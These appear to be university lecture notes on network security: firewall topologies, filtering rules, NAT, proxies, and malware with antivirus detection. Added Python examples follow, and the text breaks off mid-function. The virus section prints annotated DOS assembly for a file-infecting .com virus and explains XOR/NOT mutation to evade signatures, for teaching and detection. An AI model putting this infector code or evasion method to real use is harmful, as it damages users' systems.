
Lecture 7 CMP4103 Computer Network Security - Firewalls


Security in Information Systems: Lecture Notes in Network Security

Due on February 3, 2011

Department of Computer Architecture (DAC)

Universitat Politècnica de Catalunya (UPC)

Jordi Nin


Firewalls Viruses PPS

2 - Network Security

Jordi Nin

[email protected]

Department of Computer Architecture (DAC)

Universitat Politècnica de Catalunya (UPC)

Security in Information Systems (SSI)

Jordi Nin 2 - Network Security and Protection


Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point Security


Contents

1 Perimetral Security: Firewalls
  Introduction
  Firewall Topologies
  Filtering Rules
  Application Level Filtering

2 Viruses, Worms and Trojans

3 Point to Point Security


Definition

A firewall is a part of a computer system or network designed to block unauthorized access while permitting authorized communications. It is a device or set of devices that is configured to permit or deny network transmissions based on a set of rules and other criteria.

When do we need a firewall?

Any time we need to connect a secure network to an insecure network


Possible Attacks

According to Donn B. Parker, senior consultant from Stanford Research Institute:

• Tampering or Data Diddling → false data insertion

• Trojan Horse → a program not acting as expected

• Data leakage → unauthorized data dissemination

• Spoofing → using another computer's IP address

• Denial of Service attacks

• ...


Preliminary Definitions

• Firewall: used to refer to the security policy and security strategies

• Firewall system: set of hardware and software implementing a firewall

• Bastion Host: a secure host exposed to an insecure network

• Packet: basic Internet communication unit (datagram)

• Dual-homed host: a computer with two network interfaces

• Network perimeter or Demilitarized Zone (DMZ): a network added between the insecure network and the secure network that we need to protect


Types of Firewall

• Packet filter: packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules

• Circuit-level firewall: applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking

• Application gateway: applies security mechanisms to specific applications, such as FTP and Telnet servers

• Proxy server: intercepts all messages entering and leaving the network, acting as an intermediary between clients and servers. The proxy server hides the true network addresses


Why not implement security in the hosts?

There are many reasons, for example:

• administering security at many points is more difficult than at a single one

• hosts execute a large number of programs, so the risk increases

• network monitoring becomes easier

• the internal network structure is hidden

• ...


What can a firewall do?

• It provides a single point of defense, allowing controlled and audited access to the services provided

• It reinforces the system's own security

• It implements a security policy for access to the secure network

• It can monitor incoming / outgoing traffic

• It can limit the exposure to an insecure network

• It may become the point where security decisions are taken, since all traffic goes across it


What cannot a firewall do?

• It cannot protect the network against malicious attacks from inside the secure network

• It cannot protect the network against traffic not going across it

• It cannot protect the network against bugs in authorized services

• Any application data going across it has the potential of causing problems (e.g. Trojans)

• If the security policy is not deny-by-default, it cannot protect the network against new attacks


A Simple Dual-Homed Firewall

The dual-homed firewall is one of the simplest ways to use a firewall. The Internet comes into the firewall directly via a dial-up modem. You can't have a DMZ.

[Figure: Internet - Firewall - Switch or Hub - NetWare Server, Desktop PC]

The firewall takes care of passing packets that pass its filtering rules between the internal network and the Internet, and vice versa. The two "homes" refer to the two networks that the firewall is part of: one interface connected to the outside network, and the other connected to the inside network.


A Two-Legged Network with a Fully Exposed DMZ

The router (Internet access) is connected to a hub. Servers that want direct access to the outside world (unfiltered by the firewall) and one of the firewall's net adapters also connect to this hub. The other firewall net adapter connects to the internal hub. PCs that need to be protected are connected to this second hub.

[Figure: Internet - Switch or Hub (public network, DMZ zone: Public Webserver, Public Mailserver) - Firewall - Switch or Hub (Internal Network: Desktop PC, Netware Server)]

• Advantages: the firewall needs only two network cards. This simplifies the configuration of the firewall

• Drawbacks: the DMZ network is totally exposed to the Internet


Restricted DMZ via Dialup Firewall

To protect the DMZ network, one solution is to build a second router/firewall. This is useful if PPP is used. One machine is the exterior router/firewall (1). It is responsible for creating the PPP connection and controls the access to the DMZ zone. Firewall 2 is a standard dual-homed host and its job is to protect the internal network.

[Figure: Internet - Firewall 1 (PPP dialup) - Switch or Hub (DMZ zone: Public Webserver, Public Mailserver) - Firewall 2 - Switch or Hub (Internal Networks 1 and 2: Desktop PC, Netware Server)]


The Three-Legged Firewall

A third network card is added to the firewall for the DMZ.

[Figure: Internet - Firewall with three interfaces: one to the Internet, one to the DMZ zone (Switch or Hub: Public Webserver, Public Mailserver), one to Internal Networks 1 and 2 (Switch or Hub: Desktop PC, Netware Server)]

• Advantages: DMZ IP masquerade is possible; only one public IP address is needed

• Drawbacks: one extra net card → additional complexity


Basic Security policies

• Allow access to a service unless it is explicitly denied
  • More comfortable for users
  • Easier to administer
  • Less secure → it can't prevent unknown attacks or bugs

• Deny access to a service unless it is explicitly allowed
  • More secure, since it is very difficult to know which services are secure and which are not
  • More restrictive and less comfortable for users


Filtering Rules

Filtering rules are a set of rules for blocking or allowing network traffic according to criteria such as its port number, protocol type, ...

Possible filtering criteria

• Origin/destination address (or network)

• Origin/destination port numbers (well-known or private)

• Protocol type (IP/TCP/UDP/ICMP)

• Connection establishment


Filtering Rule Format

    iprule position action [filtering options]

• position: rule order

• action: {PERMIT | DENY}

• options:
  • -i: input interface
  • -o: output interface
  • -p: communication protocol → {IP | TCP | UDP | ICMP}
  • -s: source IP → {NETID+WILDCARD | HOST+IP | ANY}
  • -d: destination IP → {NETID+WILDCARD | HOST+IP | ANY}
  • -sport: source port → [port number:port number]
  • -dport: destination port → [port number:port number]
  • -state: connection state → {NEW, ESTABLISHED}


Wildcards

A wildcard mask is a 32-bit mask. It points out the IP address bits that have to be checked: a 0 mask bit indicates that the corresponding IP address bit has to be checked, and a 1 bit that it is ignored.

Example

• 145.34.5.6 0.0.0.0 → host 145.34.5.6

• 145.34.5.6 255.255.255.255 → ANY

• 145.34.5.6 0.0.0.255 → 145.34.5.0/24


Filtering Rules & Net Interfaces

[Figure: Internet - eth0 (in/out) - Firewall - eth1 (in/out) - Internal Network]

Example

Internal hosts may only access the WWW service and nothing else

• Rule set 1:
  • iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80
  • iprule 2 deny -i eth1 -o eth0
  • iprule 3 permit

• Rule set 2:
  • iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80
  • iprule 2 deny -i eth0 -o eth1
  • iprule 3 permit


Rule Order

Rules are only checked until a packet matches!

These two rule sets are completely different:

Rule set 1
• iprule 1 deny -p ICMP
• iprule 2 permit -p IP

Rule set 2
• iprule 1 permit -p IP
• iprule 2 deny -p ICMP

The first rule set rejects all ICMP packets, while they are accepted with the second set (IP includes ICMP, so its first rule already matches them)
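The following Python packet filter is an added example, not code from the slides: it parses the iprule syntax above (including the wildcard notation and port ranges), applies first-match semantics in position order with deny-by-default, and encodes the WWW-only rule sets and the two ICMP rule sets from the slides so their different outcomes can be checked. The Packet fields and the sample addresses are assumptions of the example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# "-p IP" matches every IP protocol: "permit -p IP" before "deny -p ICMP" lets ICMP through.
PROTO_FAMILY = {"IP": {"IP", "TCP", "UDP", "ICMP"}, "TCP": {"TCP"}, "UDP": {"UDP"}, "ICMP": {"ICMP"}}


def ip_to_int(dotted: str) -> int:
    return int.from_bytes(bytes(int(o) for o in dotted.split(".")), "big")


def wildcard_match(addr: str, netid: str, wildcard: str) -> bool:
    """Slide convention: a 0 bit in the wildcard means 'check this bit', a 1 bit 'ignore it'."""
    check = ~ip_to_int(wildcard) & 0xFFFFFFFF
    return (ip_to_int(addr) & check) == (ip_to_int(netid) & check)


@dataclass
class Packet:                     # the header fields a packet filter looks at (assumed shape)
    proto: str
    src: str
    dst: str
    iface_in: str
    iface_out: str
    sport: int = 0
    dport: int = 0
    state: str = "NEW"


@dataclass
class Rule:
    position: int
    action: str                                 # PERMIT | DENY
    proto: Optional[str] = None                 # IP | TCP | UDP | ICMP
    iface_in: Optional[str] = None
    iface_out: Optional[str] = None
    src: Optional[Tuple[str, str]] = None       # (netid, wildcard); None means ANY
    dst: Optional[Tuple[str, str]] = None
    sport: Optional[Tuple[int, int]] = None     # inclusive port range
    dport: Optional[Tuple[int, int]] = None
    state: Optional[str] = None                 # NEW | ESTABLISHED

    def matches(self, p: Packet) -> bool:
        return all([
            self.proto is None or p.proto in PROTO_FAMILY[self.proto],
            self.iface_in is None or p.iface_in == self.iface_in,
            self.iface_out is None or p.iface_out == self.iface_out,
            self.src is None or wildcard_match(p.src, *self.src),
            self.dst is None or wildcard_match(p.dst, *self.dst),
            self.sport is None or self.sport[0] <= p.sport <= self.sport[1],
            self.dport is None or self.dport[0] <= p.dport <= self.dport[1],
            self.state is None or p.state == self.state,
        ])


def _parse_addr(tokens: List[str], i: int):
    """Operand of -s / -d: ANY | HOST <ip> | <netid> <wildcard>. Returns (value, next index)."""
    if tokens[i].upper() == "ANY":
        return None, i + 1
    if tokens[i].upper() == "HOST":
        return (tokens[i + 1], "0.0.0.0"), i + 2
    return (tokens[i], tokens[i + 1]), i + 2


def _parse_ports(token: str) -> Tuple[int, int]:
    lo, _, hi = token.partition(":")            # "80" or "1024:65535"
    return int(lo), int(hi or lo)


def parse_rule(line: str) -> Rule:
    """Parse the slide's 'iprule position action [filtering options]' syntax."""
    t = line.split()
    assert t[0] == "iprule", line
    rule, i = Rule(position=int(t[1]), action=t[2].upper()), 3
    while i < len(t):
        opt = t[i]
        if opt == "-s":
            rule.src, i = _parse_addr(t, i + 1)
        elif opt == "-d":
            rule.dst, i = _parse_addr(t, i + 1)
        else:
            value, i = t[i + 1], i + 2
            if opt == "-p": rule.proto = value.upper()
            elif opt == "-i": rule.iface_in = value
            elif opt == "-o": rule.iface_out = value
            elif opt == "-sport": rule.sport = _parse_ports(value)
            elif opt == "-dport": rule.dport = _parse_ports(value)
            elif opt == "-state": rule.state = value.upper()
            else: raise ValueError(f"unknown option {opt}")
    return rule


def evaluate(rule_lines: List[str], packet: Packet) -> str:
    """First match wins: rules are checked in position order until one matches.
    No match means DENY, the deny-by-default policy the slides recommend."""
    for rule in sorted((parse_rule(ln) for ln in rule_lines), key=lambda r: r.position):
        if rule.matches(packet):
            return rule.action
    return "DENY"


# Rule sets from the slides (eth0 faces the Internet, eth1 the internal network).
WWW_OUT = ["iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80",
           "iprule 2 deny -i eth1 -o eth0", "iprule 3 permit"]
WWW_IN = ["iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80",
          "iprule 2 deny -i eth0 -o eth1", "iprule 3 permit"]
ICMP_FIRST = ["iprule 1 deny -p ICMP", "iprule 2 permit -p IP"]
IP_FIRST = ["iprule 1 permit -p IP", "iprule 2 deny -p ICMP"]
```

Note that rule set 2 permits any inbound TCP segment whose source port is 80, whatever its state; a rule carrying -state ESTABLISHED would restrict it to replies to connections opened from inside.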


Hiding Network Internals

Firewalls hide the structure of internal networks, but how?

NAT (Network Address Translation)

NAT is the process of modifying network address information in IP packet headers while in transit across a traffic routing device, for the purpose of remapping one IP address space into another


Types of NAT

NAT is out of scope for this subject... just a small reminder

Address classification

• Inside local address: internal IP address in the internal network

• Inside global address: internal IP address in the Internet

• Outside local address: external IP address in the internal network

• Outside global address: external IP address in the Internet


• Static NAT: direct mapping between the inside local and global addresses. Internal hosts can be accessed from the Internet

  Mapping of static addresses:
      ip nat inside source static local-@ global-@
  Definition of the internal interface:
      ip nat inside network-interface
  Definition of the external interface:
      ip nat outside network-interface


• Dynamic NAT: a set of global addresses is dynamically assigned. An internal host has a different IP each time it accesses the Internet

  Creation of a global address set:
      ip nat pool name start-@ end-@
  Access-list to identify the addresses to be translated:
      access-list id permit network wildcard
  Mapping of dynamic NAT:
      ip nat inside source list id pool name
  Definition of the internal / external interfaces:
      ip nat inside network-interface
      ip nat outside network-interface


• PAT: all internal hosts share the same inside global IP; ports are modified to avoid collisions

  Access-list to identify the addresses to be translated:
      access-list id permit network wildcard
  Mapping of dynamic NAT with overload (PAT):
      ip nat inside source list id interface name overload
  Definition of the internal / external interfaces:
      ip nat inside network-interface
      ip nat outside network-interface
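Added example (not from the slides, and not Cisco IOS code) of the PAT behaviour described above, in Python: all inside hosts appear with the one inside global address, a source port is rewritten only on collision, and a packet from the Internet is translated back only when an inside host opened the matching flow. The class name and the addresses (documentation ranges) are constructed for the example.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

Endpoint = Tuple[str, int]                   # (address, port)
FlowKey = Tuple[str, Endpoint, Endpoint]     # (proto, inside local endpoint, outside global endpoint)


@dataclass
class PatTable:
    """PAT as the slide describes it: every inside host is seen on the Internet with the
    single inside global address; a source port is rewritten only when it would collide."""
    inside_global: str
    port_range: Tuple[int, int] = (1024, 65535)
    by_inside: Dict[FlowKey, int] = field(default_factory=dict)              # flow -> global port
    by_global: Dict[Tuple[str, int], FlowKey] = field(default_factory=dict)  # (proto, gport) -> flow

    def _pick_port(self, proto: str, wanted: int) -> int:
        lo, hi = self.port_range
        if lo <= wanted <= hi and (proto, wanted) not in self.by_global:
            return wanted                        # no collision: keep the host's own port
        for port in range(lo, hi + 1):           # collision: first unused port in the pool
            if (proto, port) not in self.by_global:
                return port
        raise RuntimeError("PAT port pool exhausted")

    def outbound(self, proto: str, inside_local: Endpoint, outside: Endpoint) -> Endpoint:
        """Source translation for a packet leaving the inside network; creates the entry."""
        key = (proto, inside_local, outside)
        if key not in self.by_inside:
            gport = self._pick_port(proto, inside_local[1])
            self.by_inside[key] = gport
            self.by_global[(proto, gport)] = key
        return (self.inside_global, self.by_inside[key])

    def inbound(self, proto: str, outside: Endpoint, global_dst: Endpoint) -> Optional[Endpoint]:
        """Destination translation for a packet arriving from the Internet. None means drop:
        with no entry opened from inside there is nothing to translate to, which is how NAT
        hides the internal structure (it is still no substitute for filtering rules)."""
        if global_dst[0] != self.inside_global:
            return None
        key = self.by_global.get((proto, global_dst[1]))
        if key is None or key[2] != outside:      # unsolicited, or a reply from a different peer
            return None
        return key[1]


if __name__ == "__main__":
    # Constructed addresses: two inside hosts pick the same source port towards one web server.
    pat = PatTable(inside_global="198.51.100.1")
    web = ("203.0.113.10", 80)
    print(pat.outbound("TCP", ("10.0.0.5", 40000), web))    # ('198.51.100.1', 40000)
    print(pat.outbound("TCP", ("10.0.0.6", 40000), web))    # ('198.51.100.1', 1024): port rewritten
    print(pat.inbound("TCP", web, ("198.51.100.1", 1024)))  # ('10.0.0.6', 40000)
    print(pat.inbound("TCP", ("203.0.113.99", 80), ("198.51.100.1", 40000)))  # None: not a reply
```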


Description

A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers

General procedure

1 A client connects to the proxy server, requesting a service (a file or web page) available from a different server

2 The proxy server evaluates the request according to its filtering rules

3 If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client


Possible Applications

• To keep machines behind it anonymous

• To speed up access to resources (using caching)

• To apply access policy to network services or content, e.g. to block undesired sites

• To log / audit usage

• To scan transmitted content for malware before delivery

• To scan outbound content, e.g. for data leak protection

• To circumvent regional restrictions


Proxy Types and Functions I

• Caching proxy servers accelerate service requests by retrieving content saved from a previous request. They keep local copies of frequently requested resources

• Web proxy servers serve as a web cache. Most proxy programs provide a way to deny access to URLs specified in a blacklist (content filtering). Some web proxies also reformat web pages for a specific purpose or audience, such as for cell phones and PDAs

• Anonymous proxy servers attempt to anonymize web traffic
  • Open proxy (without access control): the web server receives requests from the anonymizing proxy server, and thus does not receive information about the end user's address (note that the requests are not anonymous to the anonymizing proxy server itself)
  • Closed proxy (with access control): authorized users must log on to gain access to the web. The proxy administrator (a company) can thereby track usage to individuals


Proxy Types and Functions II

• Intercepting (transparent) proxy servers combine a proxy server with a gateway or router (with NAT capabilities). Connections made by client browsers through the gateway are diverted to the proxy without client-side configuration (or knowledge). They are commonly used in businesses to prevent avoidance of acceptable use policy, and to ease administrative burden.

• Reverse proxy is a server installed in the neighborhood of one or more web (application) servers. All traffic coming from the Internet with a destination of the 'client' servers goes through the proxy server. There are several reasons for installing reverse proxy servers:
  • Encryption / SSL acceleration: the different back-end servers share the same SSL key
  • Load balancing: connections are distributed among several servers
  • Security: it is an additional layer of defense and it can protect against some OS- and web-server-specific attacks. However, it does not provide any protection against attacks on the web application or service itself
  • Additional services: data compression, caching of static content


Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans
  Introduction
  Viruses Main Components
  Antivirus

3 Point to Point Security


Historical evolution

The word virus has become a generic term describing a number of different types of attacks on computers using malicious code

1949, Bell Computer labs, 3 junior programmers: create a game called CoreWar. The object of the game is to cause all processes of the opposing program(s) to terminate, leaving your program in sole possession of the machine

Consequence → the computer crashes!


Economic cost

It is a safe bet that billions of dollars worth of damage have been done over the three decades since malicious code hit the big time (1980)

Why?

• Downtime due to the infection

• Cost of the cleaning time

• Cost of the countermeasures (antivirus)


Viruses and Public Health

Why should you care about malicious code?

• You would not want to become a carrier of some awful disease, and neither should your computer

• Nor would you want your machine to be used to infect others

A classic example of a virus is the software used to create a DDoS attack


Difference between Virus and Worm

Virus

A virus is a code fragment that copies itself into a larger program, modifying that program and depending on it. A virus executes only when its host program begins to run. The virus then replicates itself, infecting other programs as it reproduces

Worm

A worm is an independent program that reproduces by copying itself from one computer to another, usually over a network. Unlike a virus, a worm keeps its independence; it usually doesn't modify other programs


Trojan horses

A Trojan horse is a code fragment that hides inside a program and performs a disguised function

Example

• A Trap door is a mechanism built into a system by its designer. Its function is to give the designer a way to sneak back into the system, circumventing normal system protection

• A Masquerade is a generic name for a program that tricks an unsuspecting user into giving away privileges

• A Spoof is a technique used for misdirection and concealment (to hide). For instance, a communication that the sender wishes to transmit anonymously is tagged with a false return address


Malware Categories

Malware Type | Incubation / Latency | Hidden on Host | Propagation / Replication | Payload / Attack
-------------|----------------------|----------------|---------------------------|-----------------
Worm         | Short                | Not            | Automatic                 | Fixed
Virus        | Medium               | Yes            | Automatic                 | Fixed
Trojan       | Long                 | Yes (not)      | Manual                    | Fixed
Spyware      | Long (infinite)      | Yes            | Automatic (manual)        | Fixed
Bots         | Long                 | Yes (not)      | Automatic                 | Remote Control


Viruses Schema

A virus has two components:

• Replication: the survival of a virus is based on its ability to reproduce

  ... So how do I make a program reproduce? ... Easy: the simplest common viruses infect .com files (DOS executables). This file format always has code starting at address 0x100, so the virus attaches itself to the end of the file and replaces the instruction at 0x100 with a jump to its start address. Thus the viral code executes whenever the file is run; it then looks for other, uninfected .com files and infects them

• Payload: it is usually activated just after the replication step or by a trigger, such as a date, and it performs a set of bad things like:
  • Make changes to the machine's protection state
  • Make changes to user data (e.g. trash the disk)
  • Lock the network (e.g. start replicating at maximum speed)
  • Steal resources for some not-allowed tasks (e.g. use the CPU for DES key search)


Viruses Schema

Basic Virus Procedure

1 Search for a file to infect

2 Open the file to see if it is infected

3 If infected, search for another file

4 Else, infect the file

5 If payload execution conditions are met, it is executed

6 Return control to the host program


Example of a Simple Virus (hello world!) I

[Figure: the infected .com file on disk and in main memory: the jump at offset 0, then the original code and data, then the virus appended at com_size]

Virus Assembler Code

    vcode segment 'code'
    org 100h
    assume cs:vcode,ds:vcode,es:vcode
    start proc far
    begin:
        push cs
        push cs                 ;Store CS twice
        pop ds
        pop es                  ;Bring ds, es out
        call fake_proc          ;IP in the stack
    fake_proc proc near
    fake_proc endp
        pop bp                  ;bp <- proc. addr.
        sub bp,107h             ;bp at the beginning (delta from the original load address)

Virus Assembler Data

        buffer   db 7d dup(0)
        length   db 2 dup(0)
        file_inf db '*.COM',0
        jump     db 'e',0       ;<- jump ascii
    start endp                  ;End of main procedure
    vcode ends                  ;End of code segment
    end begin                   ;END. Go to begin


Example of a Simple Virus (hello world!) II

1 Search for a file

2 Open the file to see if it is infected

Virus Replication Code

    ;Find the first .com file in the directory
    mov ah, 4eh                 ;DOS Find First
    lea dx, [bp+file_inf]       ;DS:DX = offset of file_inf
    mov cx, 000h                ;Entry attributes
    int 21h
    ;Open file
    mov ah, 3dh                 ;Open the file operation
    mov al, 00000010b           ;read/write
    mov dx, 009eh               ;DX <- DTA (filename) offset
    int 21h                     ;put the handle in AX
    push ax                     ;and store it in the stack


Example of a Simple Virus (hello world!) III

4 Else, infect the file

5 If payload execution conditions are met, it is executed

6 Return control to the host program

Virus Infection Code (I)

    ;save the initial information of the .com file
    pop bx
    push bx                     ;take the handle from the stack to BX and store it again
    mov ah, 3fh                 ;Read file
    mov cx, 0003h               ;Read 3 bytes
    lea dx, [bp+buffer]         ;and store them in the buffer (data segment)
    int 21h
    mov ax, 4200h               ;move the file pointer to the beginning of the program
    mov cx, 0000h
    mov dx, 0000h
    int 21h
    ;Write the first byte (jmp)
    mov ah, 40h
    mov cx, 1d
    lea dx, [bp+jump]           ;DX <- jump offset
    int 21h                     ;write the first byte of the jump


Virus Infection Code (II)

    ;Calculate file length
    mov cx, 2
    mov si, 009ah               ;SI <- DTA offset (file size)
    lea di, [bp+length]         ;DI <- file length offset
    rep movsb                   ;copy
    ;Complete the jump instruction
    mov ah, 40h
    mov cx, 2d
    lea dx, [bp+length]         ;DX <- length offset
    int 21h
    ;Move pointer to end
    mov ax, 4202h               ;Move the file pointer to the end of the program
    mov cx, 0000h
    mov dx, 0000h
    int 21h
    add word ptr [bp+length],3  ;Restore length

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Example of a Simple Virus (hello world!) III

4 Else, infect the file

5 If payload execution conditions are met, it is executed

6 Return control to the host program

Virus Infection Code (III);Copy the virus to the program

pop bx ;Restore the handle

mov ah, 40h mov cx, length ;number of bytes to copy

lea dx, bp+begining ;Start copying from....

int 21h

printf "hello world!" ;Payload execution

;Copy the buffer containing the first 3 bytes of the file into memory

mov cx, 0003h mov di, 0100h

lea si, bp+buffer rep movsb

mov ax, 0100h ;Address needed to execute the host

jmp ax

Jordi Nin 2 - Network Security and Protection

Graphical Description

[Figure: layout of the .com file at each infection step]
Step 0: com file | length
Step 1 (failure): com file | length | virus | jmp | buffer
Step 2 (com executes): com file | length | virus1 | jmp | original | virus2 | jmp | v1

Note that the second virus infection is executed first.

Contents

1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
  Introduction
  Viruses Main components
  Antivirus
3 Point to Point Security

General Description

Virus protection software uses two main techniques:

• Signatures: antivirus (AV) solutions have relied strongly on signature-based scanning, also referred to as scan-string-based technology. The signature-based scan engine searches the given files for the presence of certain strings (often only in certain regions). If these predefined strings are found, actions such as alarms can be triggered.

• Periodical analysis: the virus protection program can go looking for trouble. It can scan the various disks and memories of the computer, detecting and reporting suspicious code segments, and placing them in quarantine.

Signature problem!

Signature-based virus protection programs require a constant flow of new signatures in response to evolving attacks. Vendors stay alert for new viruses, determine their signatures, and then make them available to their users as updated virus definition tables. Usually, users download new signatures from the WWW periodically.

Zero-day problem: it occurs when a user finds a new virus before the publisher discovers it and can issue an updated signature.


Even worse: Mutation!

Just as with biological pathogens, viruses can mutate to elude signature detection... but how? They have several options:

• a virus uses file compression software to change its signature while it is not active
• a virus changes its own form by introducing extra useless statements or adding random numbers
• a virus encrypts itself, leaving only a small header containing the decryption code and the random key


Mutation examples

• a dummy mutation: using a NOT gate (inverter), v = NOT(v) → 0010110 becomes 1101001; we have to add the code that undoes the NOT as the first virus instruction

• a not so dummy but still simple mutation: generate a random variable and use a XOR gate, key db 1 dup(01101001) and XOR(v, key) → v'

AV countermeasure: heuristic search methods
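As an added example (not part of the lecture notes), the scan-string engine from the General Description slide and the two mutations above, in Python: a signature for the plain body, the NOT and XOR transformations applied to constructed sample bytes, and a second signature that targets what a XOR mutation cannot hide, the constant decryptor stub, with a wildcard for the key byte. All byte patterns, signature names, the region limit and the stub encoding are constructed for this demonstration; the body bytes merely mirror the opcodes of the replication code shown earlier.

```python
import re

# Constructed sample bytes standing in for a virus body (they mirror the
# lecture's "mov ah,4eh ... int 21h" replication code). Not real malware.
VIRUS_BODY = bytes([0xB4, 0x4E, 0xB9, 0x00, 0x00, 0xCD, 0x21,
                    0xB4, 0x3D, 0xB0, 0x02, 0xCD, 0x21])


def xor_stub(key: int) -> bytes:
    """Constructed decryptor stub: mov al,key / xor [si],al / inc si / loop.
    Everything except the key byte is identical for every mutated copy."""
    return bytes([0xB0, key, 0x30, 0x04, 0x46, 0xE2, 0xFB])


# Signature database: name -> (compiled byte pattern, region to scan or None).
# A region limit (offset range) keeps scanning cheap and reduces false positives,
# as the lecture notes ("often only in certain regions").
SIGNATURES = {
    "HelloWorld.A (plain body)": (re.compile(re.escape(VIRUS_BODY), re.DOTALL), None),
    # Wildcard '.' for the key byte: the stub is constant apart from the key.
    "HelloWorld.B (xor decryptor stub)": (
        re.compile(rb"\xb0.\x30\x04\x46\xe2\xfb", re.DOTALL), (0, 64)),
}


def scan(data: bytes) -> list[str]:
    """Return the names of all signatures found in data."""
    hits = []
    for name, (pattern, region) in SIGNATURES.items():
        haystack = data if region is None else data[region[0]:region[1]]
        if pattern.search(haystack):
            hits.append(name)
    return hits


def not_mutate(body: bytes) -> bytes:
    """The lecture's 'dummy mutation': v = NOT(v), byte by byte."""
    return bytes((~b) & 0xFF for b in body)


def xor_mutate(body: bytes, key: int) -> bytes:
    """The lecture's second mutation: XOR every byte with a random key."""
    return bytes(b ^ key for b in body)


def build_samples() -> dict[str, bytes]:
    """Constructed .com-like hosts: a jump plus padding, then the body."""
    host = b"\xe9\x10\x00" + b"\x90" * 16
    return {
        "plain": host + VIRUS_BODY,
        # NOT-mutated body alone (the undo code the lecture mentions is not modelled)
        "not": host + not_mutate(VIRUS_BODY),
        # XOR-mutated bodies preceded by the stub that decrypts them
        "xor_69": host + xor_stub(0x69) + xor_mutate(VIRUS_BODY, 0x69),
        "xor_3c": host + xor_stub(0x3C) + xor_mutate(VIRUS_BODY, 0x3C),
    }


def scan_all() -> dict[str, list[str]]:
    """Scan every sample; the plain copy is caught by the body signature, the
    NOT copy evades both, and the XOR copies are caught only by the stub signature."""
    return {name: scan(data) for name, data in build_samples().items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name:8s} -> {hits or 'no signature matched'}")
```

The defender's lesson is in the second signature: the mutated body changes with every key, but the code that must undo the mutation at entry does not, which is why AV engines sign decryptor stubs and, as the next slides explain, fall back to heuristics when even the stub varies.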


Heuristic Search

Heuristic scanning looks for certain instructions or commands within a program that are not found in typical applications. As a result, a heuristic engine is able to detect potentially malicious functionality in new (unexamined) code, such as the replication mechanism of a virus.

Classification of HS methods

• weight-based systems rate every functionality that is detected with a certain weight according to the degree of danger it may pose. If the sum of those weights reaches a certain threshold, an alarm is triggered (quite an old system)

• rule-based systems extract certain rules from a file and compare these rules against a set of rules for malicious code. If a rule matches, an alarm is triggered


Virtual Sandbox

To determine what actions a program performs, most heuristic scanners use a sandboxed virtual machine.

When a user starts a program, the scanner launches it inside the virtual machine. If no virus-like behaviour is observed, the program is allowed to start normally; if it is, the user is asked whether the file is to be cleaned, deleted or quarantined.

Modern scanners can detect new viruses without a signature.

Problem: heuristic scanning is computationally intensive, reducing the computer's performance.


Components of a Heuristic Engine

1 variable/memory emulator
2 parser
3 flow analyzer
4 analyzer
5 disassembler/emulator
6 weight-based system and/or rule-based system

Firstly, we normalize the input file, removing bad formatting, renaming the variables, ...

Then, it looks for the entry point:
• binary files: only one
• script-based files: usually more than one (all should be checked)

Main loop:
1 Extract one instruction
2 Identify the operation
3 Update the sandbox variables environment

Finally, when the complete program has been analyzed, the functionality found can be rated (or compared with a set of rules) to decide whether the program is clean or not.

Heuristic Engines and Encrypted Viruses

Historically, heuristic engines could only assess what was visible to them: encrypted viruses caused them major problems.

Modern heuristic engines try to identify decryption loops, break them, and assess the presence of an encryption loop according to the additional functionality that is detected.


Heuristic Engines and Encrypted Viruses

So how does an AV scanner identify an encryption loop? The presence of any combination of the following conditions/instructions could indicate an encryption loop:

• initialization of a pointer with a valid memory address;
• initialization of a counter;
• memory read operation depending on the pointer;
• logical operation on the memory read result;
• memory write operation with the result from the logical operation;
• manipulation of the counter;
• branching depending on the counter.


Encryption loop example (M68k assembler)

Decryption with eor and key 1
        lea     test(pc),a0
        move.l  #10,d0          ;counter
.loop   move.b  (a0),d1
        eor.b   #1,d1           ;xor with key equal to 1
        move.b  d1,(a0)+        ;store and advance the pointer
        subq.l  #1,d0           ;update the counter
        bne.s   .loop           ;if d0 is not 0 jump to .loop

When the loop finishes, the function at test(pc) is decrypted!
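An added example, not from the lecture: the seven encryption-loop conditions encoded as both a rule-based and a weight-based heuristic in Python, run over the M68k decryption loop on this slide and over a constructed benign copy loop. It also illustrates the weight-based versus rule-based split from the Heuristic Search slide and the "extract instruction, identify operation, update environment" main loop of the heuristic engine. The weights, the threshold and the register-tracking rules are assumptions for the demonstration, not an AV vendor's engine.

```python
import re

# Constructed weights for the weight-based system; the seven condition names
# are the ones the lecture lists for an encryption loop.
WEIGHTS = {
    "pointer_init": 1,       # pointer initialised with a valid address
    "counter_init": 1,       # counter initialised
    "mem_read": 2,           # memory read through the pointer
    "logic_op": 3,           # logical operation on the value read
    "mem_write": 2,          # result written back through the pointer
    "counter_update": 1,     # counter manipulated
    "branch_on_counter": 2,  # branch depending on the counter
}
THRESHOLD = 10               # constructed: alarm when the summed weights reach it
RULE = frozenset(WEIGHTS)    # rule-based variant: all seven conditions together

INSTR = re.compile(r"^(?:(?P<label>\.\w+)\s+)?(?P<op>[a-z]+)(?:\.[bwls])?\s*(?P<args>.*)$")
LOGIC_OPS = {"eor", "and", "or", "not", "add", "sub", "rol", "ror"}


def classify(program: str) -> set[str]:
    """One pass over an M68k-style listing: extract an instruction, identify
    the operation, update the emulated register state. Returns the set of
    conditions observed."""
    pointers, counters, tainted, found = set(), set(), set(), set()
    counter_just_touched = False
    for raw in program.strip().splitlines():
        line = raw.split(";", 1)[0].strip().lower()   # drop comments
        m = INSTR.match(line) if line else None
        if not m:
            continue
        op = m["op"]
        src, dst = ([a.strip() for a in m["args"].split(",")] + [""])[:2]
        if op == "lea" and dst.startswith("a"):
            found.add("pointer_init"); pointers.add(dst)
        elif op == "move" and src.startswith("#") and dst.startswith("d"):
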